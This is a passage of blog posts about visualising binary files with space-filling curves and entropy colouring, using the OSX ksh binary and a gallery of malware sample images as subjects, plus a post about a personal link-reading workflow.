You should too.</p> Malware 2012-01-05T00:00:00+00:00 2012-01-05T00:00:00+00:00 https://corte.si/posts/visualisation/malware/ <p><b>Edit: Since this post, I've created an interactive tool for binary visualisation - see it at <a rel="external" href="http://binvis.io">binvis.io</a></b></p> <p>Hover and click for more.</p> <style> .malware { } .malware tr { border: 0; } .malware td { border: 0; position: relative; margin: 0 auto; width: 128px; height: 138px; } .malware td img { position: absolute; top:0; left:0; overflow: hidden; height: 128px; width: 128px; } .malware td .entropy { z-index: 9999; transition: opacity .3s linear; cursor: pointer; } .malware td :hover > .entropy { opacity: 0; } </style> <table class="malware"> <tr> <td> <a href="0cc9e0ba6a0bd8b79aaf2be22c496228.html"> <img class="entropy" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_entropy.png'/> <img class="charclass" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_charclass.png'/> </a> </td> <td> <a href="0dcfe476fbd68148f007e6c48c226e0f.html"> <img class="entropy" src='small_0dcfe476fbd68148f007e6c48c226e0f_entropy.png'/> <img class="charclass" src='small_0dcfe476fbd68148f007e6c48c226e0f_charclass.png'/> </a> </td> <td> <a href="03b3f30aed5b7dc39bd6e356bbde3713.html"> <img class="entropy" src='small_03b3f30aed5b7dc39bd6e356bbde3713_entropy.png'/> <img class="charclass" src='small_03b3f30aed5b7dc39bd6e356bbde3713_charclass.png'/> </a> </td> <td> <a href="131f1cb94df6e2969ac874503cbfd934.html"> <img class="entropy" src='small_131f1cb94df6e2969ac874503cbfd934_entropy.png'/> <img class="charclass" src='small_131f1cb94df6e2969ac874503cbfd934_charclass.png'/> </a> </td> <td> <a href="038e3a7add116ac69e5f9539ce461386.html"> <img class="entropy" src='small_038e3a7add116ac69e5f9539ce461386_entropy.png'/> <img class="charclass" src='small_038e3a7add116ac69e5f9539ce461386_charclass.png'/> </a> </td> </tr><tr> <td> <a href="094fedd2e4c175cd81dc170fd4d03917.html"> <img class="entropy" 
src='small_094fedd2e4c175cd81dc170fd4d03917_entropy.png'/> <img class="charclass" src='small_094fedd2e4c175cd81dc170fd4d03917_charclass.png'/> </a> </td> <td> <a href="1a30184661ee6585f4a188107e63a4d2.html"> <img class="entropy" src='small_1a30184661ee6585f4a188107e63a4d2_entropy.png'/> <img class="charclass" src='small_1a30184661ee6585f4a188107e63a4d2_charclass.png'/> </a> </td> <td> <a href="1b5bad65f8b72a52cfcae67e3e538f34.html"> <img class="entropy" src='small_1b5bad65f8b72a52cfcae67e3e538f34_entropy.png'/> <img class="charclass" src='small_1b5bad65f8b72a52cfcae67e3e538f34_charclass.png'/> </a> </td> <td> <a href="163524fb9a41e6ec79178a902797f8f1.html"> <img class="entropy" src='small_163524fb9a41e6ec79178a902797f8f1_entropy.png'/> <img class="charclass" src='small_163524fb9a41e6ec79178a902797f8f1_charclass.png'/> </a> </td> <td> <a href="177827ae9615791e067b4a9fb4be1ab9.html"> <img class="entropy" src='small_177827ae9615791e067b4a9fb4be1ab9_entropy.png'/> <img class="charclass" src='small_177827ae9615791e067b4a9fb4be1ab9_charclass.png'/> </a> </td> </tr><tr> <td> <a href="1b0e377994cfdb4eec0d2fb028118844.html"> <img class="entropy" src='small_1b0e377994cfdb4eec0d2fb028118844_entropy.png'/> <img class="charclass" src='small_1b0e377994cfdb4eec0d2fb028118844_charclass.png'/> </a> </td> <td> <a href="0b4f82e83741e79310d797d54db5a9be.html"> <img class="entropy" src='small_0b4f82e83741e79310d797d54db5a9be_entropy.png'/> <img class="charclass" src='small_0b4f82e83741e79310d797d54db5a9be_charclass.png'/> </a> </td> <td> <a href="14e6950dd4bcffe54bf158a20437e6b4.html"> <img class="entropy" src='small_14e6950dd4bcffe54bf158a20437e6b4_entropy.png'/> <img class="charclass" src='small_14e6950dd4bcffe54bf158a20437e6b4_charclass.png'/> </a> </td> <td> <a href="1998bb714c0de980635ee9b8c1951381.html"> <img class="entropy" src='small_1998bb714c0de980635ee9b8c1951381_entropy.png'/> <img class="charclass" src='small_1998bb714c0de980635ee9b8c1951381_charclass.png'/> </a> </td> 
<td> <a href="023293a96c763bbdee3991994cdcdcef.html"> <img class="entropy" src='small_023293a96c763bbdee3991994cdcdcef_entropy.png'/> <img class="charclass" src='small_023293a96c763bbdee3991994cdcdcef_charclass.png'/> </a> </td> </tr><tr> <td> <a href="14064e26cbd3daed7e6eb3b4fb245c8f.html"> <img class="entropy" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_entropy.png'/> <img class="charclass" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_charclass.png'/> </a> </td> <td> <a href="1511f2d75e07bb94f5da8cbc031a51dd.html"> <img class="entropy" src='small_1511f2d75e07bb94f5da8cbc031a51dd_entropy.png'/> <img class="charclass" src='small_1511f2d75e07bb94f5da8cbc031a51dd_charclass.png'/> </a> </td> <td> <a href="14560f7dc19e6fef87743f83e5234519.html"> <img class="entropy" src='small_14560f7dc19e6fef87743f83e5234519_entropy.png'/> <img class="charclass" src='small_14560f7dc19e6fef87743f83e5234519_charclass.png'/> </a> </td> <td> <a href="00f29767bee5f8bd5b2d55d5be734f69.html"> <img class="entropy" src='small_00f29767bee5f8bd5b2d55d5be734f69_entropy.png'/> <img class="charclass" src='small_00f29767bee5f8bd5b2d55d5be734f69_charclass.png'/> </a> </td> <td> <a href="05fd535d70dfb5ee4f36e87e39d8c70d.html"> <img class="entropy" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_entropy.png'/> <img class="charclass" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_charclass.png'/> </a> </td> </tr><tr> <td> <a href="109f8c72ff91dee5906aba0e47324526.html"> <img class="entropy" src='small_109f8c72ff91dee5906aba0e47324526_entropy.png'/> <img class="charclass" src='small_109f8c72ff91dee5906aba0e47324526_charclass.png'/> </a> </td> <td> <a href="1aa40b6ea4e7be64d4e6a024fcdf76fe.html"> <img class="entropy" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_entropy.png'/> <img class="charclass" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_charclass.png'/> </a> </td> <td> <a href="1a3aa70d060be5e6e778e3519b400bf1.html"> <img class="entropy" src='small_1a3aa70d060be5e6e778e3519b400bf1_entropy.png'/> <img 
class="charclass" src='small_1a3aa70d060be5e6e778e3519b400bf1_charclass.png'/> </a> </td> <td> <a href="08b983ec55bfd50d1d2cb9a90b1ae54e.html"> <img class="entropy" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_entropy.png'/> <img class="charclass" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_charclass.png'/> </a> </td> <td> <a href="04240e137999dc6b5115de8db3a15f53.html"> <img class="entropy" src='small_04240e137999dc6b5115de8db3a15f53_entropy.png'/> <img class="charclass" src='small_04240e137999dc6b5115de8db3a15f53_charclass.png'/> </a> </td> </tr><tr> <td> <a href="08c926bf7fbb3397236effef1b30b4df.html"> <img class="entropy" src='small_08c926bf7fbb3397236effef1b30b4df_entropy.png'/> <img class="charclass" src='small_08c926bf7fbb3397236effef1b30b4df_charclass.png'/> </a> </td> <td> <a href="09dd27fcccb9c000d37c6394364be1b5.html"> <img class="entropy" src='small_09dd27fcccb9c000d37c6394364be1b5_entropy.png'/> <img class="charclass" src='small_09dd27fcccb9c000d37c6394364be1b5_charclass.png'/> </a> </td> <td> <a href="0bcee1314e8c61fa8ef55743f3bb7742.html"> <img class="entropy" src='small_0bcee1314e8c61fa8ef55743f3bb7742_entropy.png'/> <img class="charclass" src='small_0bcee1314e8c61fa8ef55743f3bb7742_charclass.png'/> </a> </td> <td> <a href="0e2bf707dbc146c9d60c373237d050b7.html"> <img class="entropy" src='small_0e2bf707dbc146c9d60c373237d050b7_entropy.png'/> <img class="charclass" src='small_0e2bf707dbc146c9d60c373237d050b7_charclass.png'/> </a> </td> <td> <a href="0309fc0e6dbeb714c5361f82b2ccb037.html"> <img class="entropy" src='small_0309fc0e6dbeb714c5361f82b2ccb037_entropy.png'/> <img class="charclass" src='small_0309fc0e6dbeb714c5361f82b2ccb037_charclass.png'/> </a> </td> </tr><tr> <td> <a href="0ff25e3cefcce4336d0abeb9f02ccb02.html"> <img class="entropy" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_entropy.png'/> <img class="charclass" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_charclass.png'/> </a> </td> <td> <a href="19bc481e5cb1113c7eff49b67273f892.html"> 
<img class="entropy" src='small_19bc481e5cb1113c7eff49b67273f892_entropy.png'/> <img class="charclass" src='small_19bc481e5cb1113c7eff49b67273f892_charclass.png'/> </a> </td> <td> <a href="1a8700c754f97c115fa91fa161fa05cc.html"> <img class="entropy" src='small_1a8700c754f97c115fa91fa161fa05cc_entropy.png'/> <img class="charclass" src='small_1a8700c754f97c115fa91fa161fa05cc_charclass.png'/> </a> </td> <td> <a href="12e9e61357be212f28ea4c81ef75018d.html"> <img class="entropy" src='small_12e9e61357be212f28ea4c81ef75018d_entropy.png'/> <img class="charclass" src='small_12e9e61357be212f28ea4c81ef75018d_charclass.png'/> </a> </td> <td> <a href="01310712a180d9f939c126712d24363d.html"> <img class="entropy" src='small_01310712a180d9f939c126712d24363d_entropy.png'/> <img class="charclass" src='small_01310712a180d9f939c126712d24363d_charclass.png'/> </a> </td> </tr><tr> <td> <a href="1542a2f2732bbdad500bf112686503ac.html"> <img class="entropy" src='small_1542a2f2732bbdad500bf112686503ac_entropy.png'/> <img class="charclass" src='small_1542a2f2732bbdad500bf112686503ac_charclass.png'/> </a> </td> <td> <a href="096381c0f5ddc29319ba2b2647cea116.html"> <img class="entropy" src='small_096381c0f5ddc29319ba2b2647cea116_entropy.png'/> <img class="charclass" src='small_096381c0f5ddc29319ba2b2647cea116_charclass.png'/> </a> </td> <td> <a href="17fd97da6d93430ec0d9aa040b4b2c58.html"> <img class="entropy" src='small_17fd97da6d93430ec0d9aa040b4b2c58_entropy.png'/> <img class="charclass" src='small_17fd97da6d93430ec0d9aa040b4b2c58_charclass.png'/> </a> </td> <td> <a href="0d9109ab6b06f38221b713eb6a54c42f.html"> <img class="entropy" src='small_0d9109ab6b06f38221b713eb6a54c42f_entropy.png'/> <img class="charclass" src='small_0d9109ab6b06f38221b713eb6a54c42f_charclass.png'/> </a> </td> <td> <a href="18ce863d41622cd7aaa3c7d3d11e2f3e.html"> <img class="entropy" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_entropy.png'/> <img class="charclass" 
src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_charclass.png'/> </a> </td> </tr><tr> <td> <a href="0f5c70c82a74c8ff3d05fbf4d90bc5bf.html"> <img class="entropy" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_entropy.png'/> <img class="charclass" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_charclass.png'/> </a> </td> <td> <a href="0fc12afe2d283b92184897b6e7bcc2c2.html"> <img class="entropy" src='small_0fc12afe2d283b92184897b6e7bcc2c2_entropy.png'/> <img class="charclass" src='small_0fc12afe2d283b92184897b6e7bcc2c2_charclass.png'/> </a> </td> <td> <a href="12eec9b3e0aa2e6683487c13eede2382.html"> <img class="entropy" src='small_12eec9b3e0aa2e6683487c13eede2382_entropy.png'/> <img class="charclass" src='small_12eec9b3e0aa2e6683487c13eede2382_charclass.png'/> </a> </td> <td> <a href="0d97f71367f8b6dcb8cbc8ec964ebdbe.html"> <img class="entropy" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_entropy.png'/> <img class="charclass" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_charclass.png'/> </a> </td> <td> <a href="18f9ede7d921742f963a0eb06887fdfa.html"> <img class="entropy" src='small_18f9ede7d921742f963a0eb06887fdfa_entropy.png'/> <img class="charclass" src='small_18f9ede7d921742f963a0eb06887fdfa_charclass.png'/> </a> </td> </tr><tr> <td> <a href="16c533cc9b3dac1bde9885b4bd967bff.html"> <img class="entropy" src='small_16c533cc9b3dac1bde9885b4bd967bff_entropy.png'/> <img class="charclass" src='small_16c533cc9b3dac1bde9885b4bd967bff_charclass.png'/> </a> </td> <td> <a href="0eab36fc4307a1fd3ad8d832c526cf40.html"> <img class="entropy" src='small_0eab36fc4307a1fd3ad8d832c526cf40_entropy.png'/> <img class="charclass" src='small_0eab36fc4307a1fd3ad8d832c526cf40_charclass.png'/> </a> </td> <td> <a href="17fa099ecef82edd1e4ddc61be575ae4.html"> <img class="entropy" src='small_17fa099ecef82edd1e4ddc61be575ae4_entropy.png'/> <img class="charclass" src='small_17fa099ecef82edd1e4ddc61be575ae4_charclass.png'/> </a> </td> <td> <a href="07ddb50c4cc358fc3718847684ca5fae.html"> <img class="entropy" 
src='small_07ddb50c4cc358fc3718847684ca5fae_entropy.png'/> <img class="charclass" src='small_07ddb50c4cc358fc3718847684ca5fae_charclass.png'/> </a> </td> <td> <a href="04fee7e6dedf912b4a72886486627b05.html"> <img class="entropy" src='small_04fee7e6dedf912b4a72886486627b05_entropy.png'/> <img class="charclass" src='small_04fee7e6dedf912b4a72886486627b05_charclass.png'/> </a> </td> </tr> </table> <p>Clicking will show you high-detail versions of both visualizations, and let you look up the binary hash to see what it is. I've used a square Hilbert curve layout - the files start in the top-left corner, and pass through the quadrants clockwise.</p> <p>I spent hours looking through thousands of these visualizations today. I find them eerie and rather beautiful - an entirely different perspective from my day-to-day interactions with malware.</p> Visualizing entropy in binary files 2012-01-04T00:00:00+00:00 2012-01-04T00:00:00+00:00 https://corte.si/posts/visualisation/entropy/ <p><b>Edit: Since this post, I've created an interactive tool for binary visualisation - see it at <a rel="external" href="http://binvis.io">binvis.io</a></b></p> <p>Last week, I wrote about <a href="https://corte.si/posts/visualisation/binvis/">visualizing binary files using space-filling curves</a>, a technique I use when I need to get a quick overview of the broad structure of a file. Today, I'll show you an elaboration of the same basic idea - still based on space-filling curves, but this time using a colour function that measures local entropy.</p> <p>Before I get to the details, let's quickly talk about the motivation for a visualization like this. We can think of entropy as the degree to which a chunk of data is disordered. If we have a data set where all the elements have the same value, the amount of disorder is nil, and the entropy is zero. If the data set has the maximum amount of heterogeneity (i.e. 
all possible symbols are represented equally), then we also have the maximum amount of disorder, and thus the maximum amount of entropy. There are two common types of high-entropy data that are of special interest to reverse engineers and penetration testers. The first is compressed data - finding and extracting compressed sections is a common task in many security audits. The second is cryptographic material - which is obviously at the heart of most security work. Here, I'm referring not only to key material and certificates, but also to hashes and actual encrypted data. As I show below, a tool like the one I'm describing today can be highly useful in spotting this type of information.</p> <p>For this visualization, I use the <a rel="external" href="http://en.wikipedia.org/wiki/Entropy_(information_theory)">Shannon entropy</a> measure to calculate byte entropy over a sliding window. This gives us a "local entropy" value for each byte, even though the concept doesn't really apply to single symbols.</p> <p>With that out of the way, let's look at some pretty pictures.</p> <h2 id="visualizing-the-osx-ksh-binary">Visualizing the OSX ksh binary</h2> <p>In my previous post, I used the <a rel="external" href="http://en.wikipedia.org/wiki/Korn_shell">ksh</a> binary as a guinea pig, and I'll do the same here. On the left is the entropy visualization with colours ranging from black for zero entropy, through shades of blue as entropy increases, to hot pink for maximum entropy. On the right is the Hilbert curve visualization from the last post for comparison - see <a href="https://corte.si/posts/visualisation/binvis/">the post itself</a> for an explanation of the colour scheme. 
Click for larger versions with much more detail:</p> <div class="media"> <a href="hilbert-entropy-large.png"> <img src="hilbert-entropy.png" /> </a> <div class="subtitle"> entropy </div> </div><div class="media"> <a href="..&#x2F;binvis&#x2F;binary-large-hilbert.png"> <img src="..&#x2F;binvis&#x2F;binary-hilbert.png" /> </a> <div class="subtitle"> byte class </div> </div> <p>Note that this is a dual-architecture <a rel="external" href="http://en.wikipedia.org/wiki/Mach-O">Mach-O</a> file, containing code for both i386 and x86_64. You can see this if you squint somewhat at these images - some broad structures in the file are repeated twice. We can see that there are a number of different sections of the <strong>ksh</strong> binary that have very high entropy. It's not immediately obvious why a system binary would contain either compressed sections or cryptographic material. As it happens, the explanation in this case is quite interesting. Let's have a closer look:</p> <div class="media"> <a href="entropy-annotated.png"> <img src="entropy-annotated.png" /> </a> </div> <p>Sections <strong>1</strong> and <strong>2</strong> are a lovely validation of the central idea of this post. These two areas do indeed contain cryptographic material - in this case, <a rel="external" href="http://developer.apple.com/library/mac/#technotes/tn2206/_index.html">code signing hashes and certificates</a>. Rather satisfyingly, they stand out like a sore thumb. It turns out that all of the official OSX binaries are signed by Apple. 
This is then used in turn to apply <a rel="external" href="http://developer.apple.com/library/mac/#technotes/tn2206/_index.html">a variety of policies</a>, depending on who the signatory is, and whether they are trusted.</p> <p>You can dump some rudimentary data about a binary's signature using the <strong>codesign</strong> command (which you can also use to sign binaries yourself):</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>&gt; codesign -dvv /bin/ksh</span></span> <span class="giallo-l"><span>Executable=/bin/ksh</span></span> <span class="giallo-l"><span>Identifier=com.apple.ksh</span></span> <span class="giallo-l"><span>Format=Mach-O universal (i386 x86_64)</span></span> <span class="giallo-l"><span>CodeDirectory v=20100 size=5662 flags=0x0(none) hashes=278+2 location=embedded</span></span> <span class="giallo-l"><span>Signature size=4064</span></span> <span class="giallo-l"><span>Authority=Software Signing</span></span> <span class="giallo-l"><span>Authority=Apple Code Signing Certification Authority</span></span> <span class="giallo-l"><span>Authority=Apple Root CA</span></span> <span class="giallo-l"><span>Info.plist=not bound</span></span> <span class="giallo-l"><span>Sealed Resources=none</span></span> <span class="giallo-l"><span>Internal requirements count=1 size=92</span></span></code></pre> <p>Section <strong>3</strong> (the two occurrences are the same data repeated for each architecture) is interesting for a different reason - it's a cautionary example of how the simple entropy measure we're using sometimes detects high entropy in highly structured data. 
A hex dump of the start of the region looks like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>000d1f00 00 01 00 00 00 02 00 00 00 06 00 00 00 00 00 00 |................|</span></span> <span class="giallo-l"><span>000d1f10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|</span></span> <span class="giallo-l"><span>000d1f20 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |................|</span></span> <span class="giallo-l"><span>000d1f30 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f |................|</span></span> <span class="giallo-l"><span>000d1f40 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f | !&quot;#$%&amp;&#39;()*+,-./|</span></span> <span class="giallo-l"><span>000d1f50 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f |0123456789:;&lt;=&gt;?|</span></span> <span class="giallo-l"><span>000d1f60 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f |@ABCDEFGHIJKLMNO|</span></span> <span class="giallo-l"><span>000d1f70 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f |PQRSTUVWXYZ[\]^_|</span></span> <span class="giallo-l"><span>000d1f80 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f |`abcdefghijklmno|</span></span> <span class="giallo-l"><span>000d1f90 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f |pqrstuvwxyz{|}~.|</span></span> <span class="giallo-l"><span>000d1fa0 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f |................|</span></span> <span class="giallo-l"><span>000d1fb0 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f |................|</span></span> <span class="giallo-l"><span>000d1fc0 a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af |................|</span></span> <span class="giallo-l"><span>000d1fd0 b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf |................|</span></span> <span class="giallo-l"><span>000d1fe0 c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf |................|</span></span> <span class="giallo-l"><span>000d1ff0 d0 
d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df |................|</span></span> <span class="giallo-l"><span>000d2000 e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef |................|</span></span> <span class="giallo-l"><span>000d2010 f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff |................|</span></span></code></pre> <p>We see that this section contains each byte value from 0x00 to 0xff in order - furthermore this whole block is repeated with minor variations a number of times. There are two things to explain here - why is this detected as "high entropy" data, and what the heck is it doing in the file?</p> <p>First, we need to understand that the Shannon entropy measure looks only at the relative occurrence frequencies of individual symbols (in this case, bytes). A chunk of data like the one above therefore looks like it has high entropy, because each symbol occurs once and only once, making the data highly heterogeneous.</p> <p>Now, what earthly use would chunks of data like this be? With a bit of digging, I found the answer in the <strong>ksh</strong> source code. These sections are maps used for translation between various <a rel="external" href="http://en.wikipedia.org/wiki/EBCDIC">character</a> <a rel="external" href="http://en.wikipedia.org/wiki/ASCII">encodings</a>. If you're interested, here's the <a rel="external" href="http://opensource.apple.com/source/ksh/ksh-13/ksh/src/lib/libast/string/ccmap.c">culprit in all its repetitive glory</a>.</p> <h2 id="the-code">The code</h2> <p>As usual, the code for generating all of the images in this post is up on GitHub. 
The entropy visualizations were created with <a rel="external" href="https://github.com/cortesi/scurve/blob/master/binvis">binvis</a>, a new addition to <a rel="external" href="https://github.com/cortesi/scurve">scurve</a>, my compendium of code related to space-filling curves.</p> A personal link mill 2011-12-30T00:00:00+00:00 2011-12-30T00:00:00+00:00 https://corte.si/posts/socialmedia/linkmill/ <p>I posted a link to an interesting visualization paper on Twitter today, <a rel="external" href="https://twitter.com/#!/__mharrison__/status/152503684822081537">prompting someone to ask me where I had found it</a>. Sadly, I had to admit that I had no clue where I first saw it referenced, due to the way I consume links I find on the net. So, I thought I'd write a quick blog post to explain myself, and then pitch a product idea that could make my life (and maybe yours) much easier.</p> <p>First, the problem statement: my aim is to efficiently discover links to interesting stuff on the net. Simple as that. A few years ago, my flow of links came mostly from social news sites (<a rel="external" href="http://news.ycombinator.com">Hacker News</a> and <a rel="external" href="http://reddit.com">Reddit</a>), and items shared by people I follow on social networks. Over time, I became more and more disenchanted with this way of doing things. The social news approach is to take a torrent of very low quality links (user submissions), and then crowd-source the filtration process through voting. But popularity is not a good measure of information quality, and the result is a bland, lowest-common-denominator view of the world that has no room for anything that doesn't make it to the front page. Don't get me wrong - Reddit and HN do a lot of other things well - but they just don't cut it as primary information sources. Mining links from social networks is a more promising approach, but still problematic. 
None of the social networks provide the tools needed to extract shared links from the update stream and consume them efficiently. There is also a structural issue - I don't necessarily want to mix my social ties and my information sources, and I definitely don't want to be limited to just one platform. These are separate functions that I feel require separate tools.</p> <h2 id="my-personal-link-mill">My personal link mill</h2> <p>Eventually, I took matters into my own hands. First, I hugely broadened the number of information sources I consumed. The tool I use for this is Google Reader - I now subscribe to about 800 individual feeds, and this number is growing daily. The trick here is to find high-quality, low-volume link sources. The motherlode of good links for me was to be found on social bookmarking sites. About 700 of my subscriptions are to the RSS feeds of individual users on <a rel="external" href="http://pinboard.in">Pinboard</a> and <a rel="external" href="http://delicious.com">Delicious</a>. This gives me very fine control and a great mix of interests. Plus, getting links from individual curators handily sidesteps the social news group-think problem. The remainder of my subscriptions are split between blogs, some sub-Reddits, a few Twitter users and subsections of <a rel="external" href="http://arxiv.org">arXiv</a>.</p> <p>So much for how my intake works. Just as important is the way that I consume it. I do my "filtering" in batches, usually in the evening. Using <a rel="external" href="http://reederapp.com/">Reeder</a> on my iPad works well for me, letting me flick quickly and comfortably through all the new links of the day. When I find something that looks interesting, I resist the temptation to read it then and there - instead, I batch up all my reading for later. If it's a web page, it goes to <a rel="external" href="http://www.instapaper.com/">Instapaper</a>. 
If it's a PDF, it gets downloaded into a <a rel="external" href="http://www.dropbox.com/">DropBox</a> folder, which is synced to <a rel="external" href="http://www.goodiware.com/goodreader.html">GoodReader</a>.</p> <p>Finally, the actual reading. Every morning, I toddle off to a nice cafe with my iPad, and read all the interesting stuff I saved the previous day in a single sitting. I'm ruthless about just skimming things that don't warrant careful attention. If I find something particularly interesting I save it permanently, and perhaps tweet it or mail it to someone I think might be interested.</p> <h2 id="problems-and-a-product-idea">Problems - and a product idea?</h2> <p>This system works for me, but it has many problems. There's no end-to-end coordination, so by the time I sit down to actually read something, I have no easy way to tell which feed it came from. Google Reader sucks at managing hundreds of low-volume subscriptions. Reeder is great, but is not tailored to consuming redundant information from many sources. The end result is that maintaining the system I have is a time-consuming pain in the ass. The fact that it's still worth it despite this makes me think there might be commercial room for a better solution.</p> <p>Which brings me to a rough product idea - a formalized version of this link mill for people who want to take direct control of their information intake. The business end is a generalized feed consumer, letting you subscribe to RSS feeds, Twitter users, Google+ updates, sub-Reddits and other information sources. Links are extracted from these feeds, keeping track of which links appeared where. The user is then presented with a stream of links to consume, de-duplicated so that those appearing in multiple feeds are presented only once. The system keeps track of links the user marks as "interesting", batching them for later consumption. 
It also uses this information to score the feeds, letting the user see which feeds are low quality, and should be ditched. Given the right tools, the time needed for a user to maintain and tend their link feed garden would be quite modest, and the rewards would be great.</p> <p>If someone built this, I for one would gladly fork over some of my hard-earned doubloons to use it. In fact, with some validation of the idea and a few collaborators I might think of building it myself. Does this sound useful to anyone else?</p> Visualizing binaries with space-filling curves 2011-12-23T00:00:00+00:00 2011-12-23T00:00:00+00:00 https://corte.si/posts/visualisation/binvis/ <p><b>Edit: Since this post, I've created an interactive tool for binary visualisation - see it at <a rel="external" href="http://binvis.io">binvis.io</a></b></p> <p>In my day job I often come across binary files with unknown content. I have a set of standard avenues of attack when I confront such a beast - use "file" to see if it's a known file type, "strings" to see if there's readable text, run some in-house code to extract compressed sections, and, of course, fire up a hex editor to take a direct look. There's something missing in that list, though - I have no way to get a quick view of the overall structure of the file. Using a hex editor for this is not much chop - if the first section of the file looks random (i.e. probably compressed or encrypted), who's to say that there isn't a chunk of non-random information a meg further down? Ideally, we want to do this type of broad pattern-finding by eye, so a visualization seems to be in order.</p> <p>First, let's begin by picking a colour scheme. 
We have 256 different byte values, but for a first-pass look at a file, we can compress that down into a few common classes:</p> <table> <tr> <td style="background-color: #000000">&nbsp;</td> <td>0x00</td> </tr> <tr> <td style="background-color: #ffffff">&nbsp;</td> <td>0xFF</td> </tr> <tr> <td style="background-color: #377eb8">&nbsp;</td> <td>Printable characters</td> </tr> <tr> <td style="background-color: #e41a1c">&nbsp;</td> <td>Everything else</td> </tr> </table> <p>This covers the most common padding bytes, nicely highlights strings, and lumps everything else into a miscellaneous bucket. The broad outline of what we need to do next is clear - we sample the file at regular intervals, translate each sampled byte to a colour, and write the corresponding pixel to our image. This brings us to the big question - what's the best way to arrange the pixels? A first stab might be to lay the pixels out row by row, snaking to and fro to make sure each pixel is always adjacent to its predecessor. It turns out, however, that this zig-zag pattern is not very satisfying - small scale features (i.e. features that take up only a few lines) tend to get lost. What we want is a layout that maps our one-dimensional sequence of samples onto the 2-d image, while keeping elements that are close together in one dimension as near as possible to each other in two dimensions. This is called "locality preservation", and the <a rel="external" href="http://en.wikipedia.org/wiki/Space-filling_curve">space-filling curves</a> are a family of mathematical constructs that have precisely this property. If you're a regular reader of this blog, you may know that I have an <a href="https://corte.si/posts/code/hilbert/portrait/">almost</a> <a href="https://corte.si/posts/code/sortvis-fruitsalad/">unseemly</a> <a href="https://corte.si/posts/code/hilbert/swatches/">fondness</a> for these critters. So, let's add a couple of space-filling curves to the mix to see how they stack up. 
The <a rel="external" href="http://en.wikipedia.org/wiki/Z-order_curve">Z-Order curve</a> has found wide practical use in computer science. It's not the best in terms of locality preservation, but it's easy and quick to compute. The <a rel="external" href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert curve</a>, on the other hand, is (nearly) as good as it gets at locality preservation, but is much more complicated to generate. Here's what our three candidate curves look like - in each case, the traversal starts in the top-left corner:</p> <div class="container"> <div class="row"> <div class="column"> <img src="zigzag.png"/> <h4>Zigzag</h4> </div> <div class="column"> <img src="zorder.png"/> <h4>Z-order</h4> </div> <div class="column"> <img src="hilbert.png"/> <h4>Hilbert</h4> </div> </div> </div> <p>And here they are, visualizing the <a rel="external" href="http://en.wikipedia.org/wiki/Korn_shell">ksh</a> (<a rel="external" href="http://en.wikipedia.org/wiki/Mach-O">Mach-O</a>, <a rel="external" href="http://en.wikipedia.org/wiki/Fat_binary">dual-architecture</a>) binary distributed with OSX - click for the significantly more spectacular larger versions of the images:</p> <div class="container"> <div class="row"> <div class="column"> <a href="binary-large-zigzag.png"><img src="binary-zigzag.png"/></a> <h4>Zigzag</h4> </div> <div class="column"> <a href="binary-large-zorder.png"><img src="binary-zorder.png"/></a> <h4>Z-order</h4> </div> <div class="column"> <a href="binary-large-hilbert.png"><img src="binary-hilbert.png"/></a> <h4>Hilbert</h4> </div> </div> </div> <p>The classical Hilbert and Z-Order curves are actually square, so for these visualizations I've unrolled them, stacking four sub-curves on top of each other. To my eye, the Hilbert curve is the clear winner here. Local features are prominent because they are nicely clumped together. 
The Z-order curve shows some annoying artifacts with contiguous chunks of data sometimes split between two or more visual blocks.</p> <p>The downside of the space-filling curve visualizations is that we can't look at a feature in the image and tell where, exactly, it can be found in the file. I'm toying with the idea (though not very seriously) of writing an interactive binary file viewer with a space-filling curve navigation pane. This would let the user click on or hover over a patch of structure and see the file offset and the corresponding hex.</p> <h2 id="more-detail">More detail</h2> <p>We can get more detail in these images by increasing the granularity of the colour mapping. One way to do this is to use a trick I first concocted to <a href="https://corte.si/posts/code/hilbert/portrait/">visualize the Hilbert Curve at scale</a>. The basic idea is to use a 3-d Hilbert curve traversal of the RGB colour cube to create a palette of colours. This makes use of the locality-preserving properties of the Hilbert curve to make sure that similar elements have similar colours in the visualization. See the <a 